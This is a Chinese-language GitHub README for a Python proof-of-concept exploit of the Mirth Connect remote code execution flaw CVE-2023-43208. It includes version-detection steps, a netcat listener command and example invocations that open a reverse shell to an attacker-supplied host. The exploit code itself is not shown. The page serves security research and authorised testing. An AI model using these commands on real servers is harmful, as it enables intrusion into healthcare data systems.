predyy/CVE-2023-43208

GitHub: predyy/CVE-2023-43208

针对 Mirth Connect CVE-2023-43208 RCE 漏洞的轻量级 Python 概念验证脚本,集成版本检测与反弹 Shell 利用功能。

Stars: 1 | Forks: 0

# CVE-2023-43208 Mirth Connect RCE PoC 针对 Mirth Connect 中 **CVE-2023-43208** 漏洞的概念验证 Python 脚本。 ## 免责声明 仅在你拥有或明确获得授权测试的环境中使用。本仓库仅供安全研究、验证和防御性测试。作者对因使用本工具而导致的任何误用或损害不承担任何责任。 ## 概述 `exp.py` 是 [PoC](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) 的一个最小依赖版本,它可以: - 检测目标是否为 Mirth Connect 实例 - 从 `/api/server/version` 请求 Mirth Connect 版本 - 检查版本是否低于 `4.4.1` - 如果目标似乎存在漏洞,则向 `/api/users` 发送 XML payload 该脚本默认使用 **HTTPS**,可以通过 `--http` 切换为 **HTTP**。 ## 用法 ``` python3 exp.py -u -lh -lp [--http] ``` ### 参数 - `-u`, `--url`: 目标 Mirth Connect URL 或主机 - `-lh`, `--lhost`: 用于反向连接的本地主机/IP - `-lp`, `--lport`: 本地监听端口 - `--http`: 强制使用 HTTP 而非 HTTPS(默认为 HTTPS) ## 示例 首先启动一个监听器: ``` nc -lvnp 4444 ``` 运行脚本: ``` python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444 ``` 针对仅支持 HTTP 的目标: ``` python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http ``` ## 注意事项 - 脚本中禁用了 SSL 证书验证。 - 脚本在发送 payload 之前会提示确认。 - 版本检测基于与 `4.4.1` 的语义比较。 - 被检测为 Mirth Connect 的目标不保证一定可以利用(网络、环境和运行时差异可能会影响结果)。 ## 致谢 - 原始漏洞发现:IHTeam - 原始代码:`K3ysTr0K3R` 和 `Chocapikk` - 最小依赖版本:`predyy`
标签:API 安全, CISA项目, CVE-2023-43208, Maven, Mirth Connect, PoC, Python, RCE, T1059, XML 注入, 医疗信息学, 无后门, 暴力破解, 未授权访问, 漏洞验证, 编程工具, 网络安全, 远程代码执行, 逆向 Shell, 逆向工具, 隐私保护